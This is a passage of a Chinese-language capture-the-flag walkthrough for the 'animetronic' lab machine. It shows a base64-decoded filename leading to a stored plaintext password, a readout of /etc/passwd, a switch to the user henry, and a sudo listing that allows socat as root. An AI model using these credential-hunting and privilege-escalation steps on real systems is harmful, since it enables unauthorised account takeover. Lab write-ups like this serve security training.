..\n-rwxrwxr-x 1 henry henry 30 Jan 5 10:08 .bash_history\n-rwxrwxr-x 1 henry henry 220 Jan 6 2022 .bash_logout\n-rwxrwxr-x 1 henry henry 3771 Jan 6 2022 .bashrc\ndrwxrwxr-x 2 henry henry 4096 Nov 27 10:08 .cache\ndrwxrwxr-x 3 henry henry 4096 Nov 27 10:42 .local\ndrwxrwxr-x 402 henry henry 12288 Nov 27 18:23 .new_folder\n-rwxrwxr-x 1 henry henry 807 Jan 6 2022 .profile\ndrwxrwxr-x 2 henry henry 4096 Nov 27 10:04 .ssh\n-rwxrwxr-x 1 henry henry 0 Nov 27 18:26 .sudo_as_admin_successful\n-rwxrwxr-x 1 henry henry 119 Nov 27 18:18 Note.txt\n-rwxrwxr-x 1 henry henry 33 Nov 27 18:20 user.txt\nmichael@animetronic:\/home\/henry$ cat user.txt \n0833990328464efff1de6cd93067cfb7\nmichael@animetronic:\/home\/henry$ cat Note.txt \nif you need my account to do anything on the server,\nyou will find my password in file named\n\naGVucnlwYXNzd29yZC50eHQK<\/code><\/pre>\n\u627e\u654f\u611f\u6587\u4ef6<\/h3>\nfind \/ -name aGVucnlwYXNzd29yZC50eHQK -type f 2>\/dev\/null<\/code><\/pre>\n\u6ca1\u6709\u53d1\u73b0\uff0c\u8fdb\u884cbase64\u89e3\u7801\uff1a<\/p>\n
echo "aGVucnlwYXNzd29yZC50eHQK" | base64 -d\nhenrypassword.txt\nfind \/ -name henrypassword.txt -type f 2>\/dev\/null\n\/home\/henry\/.new_folder\/dir289\/dir26\/dir10\/henrypassword.txt<\/code><\/pre>\n\u770b\u4e00\u4e0b\u6587\u4ef6\u5185\u5bb9\uff1a<\/p>\n
IHateWilliam<\/code><\/pre>\n\u5207\u6362henry\u7528\u6237<\/h3>\n
\u5b83\u7684\u540d\u5b57\u663e\u793a\u8fd9\u662fhenry<\/code>\u7684\u5bc6\u7801\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u6709\u8fd9\u4e2a\u7528\u6237\uff1a<\/p>\nmichael@animetronic:\/home\/henry$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:104::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:105:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\npollinate:x:105:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nusbmux:x:107:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\nhenry:x:1000:1000:Hanry:\/home\/henry:\/bin\/bash\nmysql:x:108:113:MySQL Server,,,:\/nonexistent:\/bin\/false\nmichael:x:1001:1001::\/home\/michael:\/usr\/bin\/bas<\/code><\/pre>\n\u6709\u7684\uff0c\u5c1d\u8bd5\u5207\u6362\u7528\u6237\uff1a<\/p>\n
michael@animetronic:\/home\/henry$ su henry\nPassword: \nhenry@animetronic:~$ whoami;id\nhenry\nuid=1000(henry) gid=1000(henry) groups=1000(henry),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)<\/code><\/pre>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nhenry@animetronic:~$ sudo -l\nMatching Defaults entries for henry on animetronic:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser henry may run the following commands on animetronic:\n (root) NOPASSWD: \/usr\/bin\/socat<\/code><\/pre>\n
![\"image-20240403152606719\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947774.png\")
<\/div>![\"image-20240403152619033\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947775.png\")
<\/div><\/p>\n![\"image-20240403152709630\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947776.png\")
<\/div><\/p>\n![\"image-20240403152753488\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947777.png\")
<\/div><\/p>\n![\"image-20240403153704311\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947778.png\")
<\/div><\/p>\n![\"image-20240403184234499\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947779.png\")
<\/div><\/p>\n